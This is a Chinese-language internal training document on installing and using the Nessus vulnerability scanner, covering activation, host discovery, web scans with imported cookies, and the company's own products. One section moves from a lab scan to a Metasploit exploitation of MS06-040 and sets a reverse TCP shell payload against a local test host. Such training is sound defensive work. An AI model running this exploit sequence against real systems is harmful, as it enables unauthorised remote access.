安全测试工具Nessus调研培训0217Nessus安装使用

1、安全测试工具_Nessus1.Nessus简介Nessus是一款系统漏洞扫描与分析工具，该工具提供完整的电脑漏洞扫描服务，并随时更新其漏洞数据库。Nessus不同于传统的漏洞扫描软件，Nessus可同时在本机或远端上遥控，进行系统的漏洞分析扫描。对应渗透测试人员来说，Nessus是必不可少的工具之一。它不仅免费而且更新极快。图1.1Nessus系列支持多种平台，Nessus系列包括Essentials、Professional、tenable.io，其中Essentials版可免费使用，可用来扫描环境（每个扫描程序最多 16 个 IP 地址），可获得无异于 Nessus 订阅用户所享的高速、深

2、度评估，以及无代理式扫描便利性。专业版一年费用为$2,390.00，tenable.io版按照企业资产来定价。网站：/products/nessus-vulnerability-scanner该工具提供完整的电脑漏洞扫描服务，并随时更新其漏洞数据库。Nessus安全扫描器的功能是对指定网络进行安全检查，找出该网络是否存在有导致黑客攻击的安全漏洞。该系统被设计为client/sever模式，服务器端负责进行安全检查，客户端用来配置管理服务器端。在服务端还采用 了plugin的体系，允许用户加入执行特定功能的插件，这插件可以进行更快速和更复杂的安全检查。在

3、Nessus中还采用了一个共享的信息接口，称为 知识库，其中保存了前面进行检查的结果。检查的结果可以HTML、纯文本、LaTeX（一种文本文件格式）等几种格式保存。Nessus不仅可以扫描网站，还可以扫描主机。它由一个执行任务的服务端，和一个分配任务的客户端组成。2 Nessus下载安装在安装Nessus工具之前，首先要获取该工具的安装包。而且，Nessus工具安装后，必须要激活才可使用。所以，下面将分别介绍获取Nessus安装包和激活码的方法。2.1获取Nessus软件包Nessus的官方下载地址是：/downloads/nessus在浏览器中输入

4、以上地址，将打开如图所示的界面。图2.1Nessus下载路径从该界面可以看到，官网提供了Nessus工具各种平台的安装包，如Windows、Mac OS X、Linux、FreeBSD等。用户可以根据自己的操作系统及架构，选择对应的安装包，下载即可。例如，下载Windows 64位架构的包，则单击Nessus-8.9.0-X64.msi。2.2获取激活码在使用Nessus之前，必须先激活该服务才可使用。如果要激活Nessus服务，则需要到官网获取一个激活码。下面将介绍获取激活码的方法。在上图中，点击Get Activation Code按钮，弹出图2.2用户注册我们获取免费的Nessus Es

5、sentials版本，点击立即注册，将打开如图所示的界面填写邮箱，注册后邮箱中收到激活码。图2.3获取激活码在该界面First Name和Last Name文本框中，用户可以任意填写。但是，Email下的文本框必须填写一个合法的邮件地址，用来获取邮件。当以上信息设置完成后，单击Register按钮。接下来，将会在注册的邮箱中收到一份关于Nessus的邮件。进入邮箱打开收到的邮件，将会看到一串数字，类似XXXX-XXXX-XXXX-XXXX，即激活码。当成功安装Nessus工具后，就可以使用以上获取到的激活码来激活该服务了。2.3 Nessus工具在Windows下安装具体操作步骤如下所示：（1

6、）双击下载的安装包，将弹出安装向导对话框，如图2.4所示。（2）该对话框显示了一些欢迎信息。此时单击Next按钮，将弹出许可证协议对话框，如图2.5所示。图2.4安装向导对话框图2.5许可证协议对话框（3）该界面显示了安装Nessus的许可证信息。此时，选择I accept the terms in the license agreement单选按钮。然后单击Next按钮，将弹出安装位置对话框，如图2.6所示。（4）该界面可以选择Nessus工具的安装位置，默认将安装在C:Program FilesTenableNessus目录中。如果用户希望安装到其它位置，则单击Change.按钮，选择其安

7、装位置。本例中使用默认的安装位置，并单击Next按钮，将弹出准备安装对话框，如图2.7所示。图2.6选择安装位置对话框图2.7准备安装对话框（5）该界面提示将开始安装Nessus工具。此时，单击Install按钮，将开始安装。安装完成后，将弹出安装完成向导对话框，如图2.8所示。（6）从该界面可以看到Nessus工具已安装完成。此时，单击Finish按钮，退出安装向导界面，将自动在网页中打开继续配置界面，如图2.9所示。图2.8安装完成对话框图2.9欢迎使用Nessus（7）该界面提示访问Nessus服务需要通过SSL协议，在该界面点击clicking here链接，将打开如图2.10所示的界

8、面。图2.10安全证书（8）该界面提示证书存在错误，是因为该站点使用了不受信任的自签名的SSL证书。如果确认该站点没问题，则单击“继续浏览此网站”选项，将显示如图2.11所示的界面。图2.11欢迎信息图2.12初始化用户设置（9）该界面显示了Nessus工具的欢迎信息。此时，单击Continue按钮，将显示如图2.12所示的界面。（10）该界面用来创建一个帐号，用户管理Nessus服务。这里创建一个名为admin的用户，并为该用户设置一个密码。设置完成后，单击Continue按钮，将显示如图2.14所示的界面。图2.13填写激活码图2.14加载Nessus插件（11）在该界面Activatio

9、n Code对应的文本框中，输入前面获取到的激活码。然后，单击Continue按钮，将开始加载Nessus中的插件，如图2.14所示。（12）从该界面可以看到正在下载插件，并进行初始化。此过程，大概需要十分钟的时间。当初始化完成后，将显示如图1.15所示的界面。（13）该界面是登录Nessus服务界面。在该界面输入的用户名和密码，就是在前面初始化过程中创建的用户和密码。输入用户名和密码后，单击Sign In按钮，即可成功登录Nessus服务。提示：以上过程中的Nessus服务登录界面，是自动弹出的。当用户关闭后，则需要重新登录。此时，用户在浏览器中输入https:/IP:8834/或https

10、:/主机名:8834/地址，即可打开如图2.10所示的界面。然后，选择“继续浏览此网站”选项，即可打开登录页面。图2.15登录Nessus服务3 Nessus操作实例Nessus使用8834端口作为后台，你在本地输入https:/localhost:8834即可转到登录后台页面，然后输入账户名和密码即可登录。图3.1Nessus主界面它有两个大的选择按钮：Scans 和 Settings。下面通过3个实例，介绍Nessus的使用过程。3.1 扫描局域网存活主机点击“New Scan”，在提供的模板里我们选择需要的模板，如果我们要扫描的是一个网站，我们选择Web Application Test

11、s；如果是要扫描一个主机的话，我们选择Advanced Scan；图3.2Nessus提供的模板我们扫描局域网存活主机，选择“Host Discovery”，在弹出的通用配置里设置“Name”（本次扫描的名字），“Target”（扫描目标），扫的是全网段的 ，扫描器配置如下图 图3.3配置扫描器之后“点击保存”后会进行自动扫描，2分钟后扫描结果 图3.3扫描结果19个主机在线，测试结果与真实环境相同。3.2 主机扫描先在本地搭建低版本服务器，IP为12；新建扫描，设置扫描策略为“Advanced Scan”，然后 “Target”填上192.168.

12、1.112，扫描结果如下图3.4扫描结果2漏洞分为5种程度，最高级别Critical最低级别info。20个紧急漏洞，8个高危漏洞。图3.5扫描结果3上面MSxx-xxx是微软漏洞编码，点进去看每个漏洞的具体描述信息，通过对漏洞的分析，我们可以更好地加固我们的系。随随便便选择一个找到Exp，接下来漏洞结合MSF进行漏洞利用。当然，直接根据漏洞的编码百度一下利用方法也是可以的，这里就直接用BT5吧找一个比较老的洞：ms06-040BT5 的 CMD 输入 msfconsole 进入MSF欢迎界面我们按照MSF的一般执行过程来操作（选择模版设置PAYLOAD设置参数攻击）1search ms06_

13、040/ 查找ms06_040相关漏洞模块找到对应模块后1234567use exploit/windows/smb/ms06_040_netapi/ 使用ms06_040_netapi模块show options/ 查看漏洞配置信息setPAYLOAD windows/shell/reverse_tcp/ 设置PAYLOADsetRHOST 12/ 目标IPsetLHOST 17/ 本机IP/ 端口号 和 目标类型 默认就OK了exploit/ 进行攻击攻击结果图3.6攻击结果3.3导入Cookie进行Web应用安全扫描在不导入Cookie使用Ne

14、ssus进行扫描的时候，扫描的结果是比较简单的，很多深层的问题无法被扫描出来。需要我们手动导入Cookie，带着Cookie的状态扫描的结果会更详细更深入，以下是操作步骤:在网站登录状态下，在浏览器地址栏输入document.cookie将光标移至行首手动输入javascript:完整格式如下:javascript:document.cookie回车后可查看到Cookie信息，如下图:访问/misc/cookies进行Cookie格式转换，如下图:输入目标地址域名，将刚才复制的信息粘贴至Input栏，点击Generate生成标准格式的Cookie信息。将生成

15、的Cookie信息保存到文本文件中保存为任意文件名。在Nessus扫描配置中的认证方法项目里选择HTTP Cookies import，点击下面的Add file并导入刚才保存的文本文件。此时再扫描就是带着Cookie的状态了。除了实例中介绍的基础扫描，还有高级扫描。高级扫描可以理解为基础扫描中的配置项不选择已配好的策略，而是使用Custom选项进行自定义配置。4. 总结Nessus系统漏洞扫描与分析软件，可以扫描系统漏洞，可适用于亚控所有产品，Kingfusion、SCADA、Kingview、Kingportal等；可以扫面WEB应用程序，适用于Kingfusion的WebClient、Kingportal、SCADA的WebClient；支持Linux、Windows系统，可以进行云管理。Nessus的Essentials版本，一个扫描程序可支持16个IP地址，该版本免费，可用于个人和商业用途，可满足我们产品的基本安全测试。如果有较高的安全测试需求，Nessus可提供付费使用Professional版、tenable.io。Professional版一年费用为$2,390.00，tenable.io版按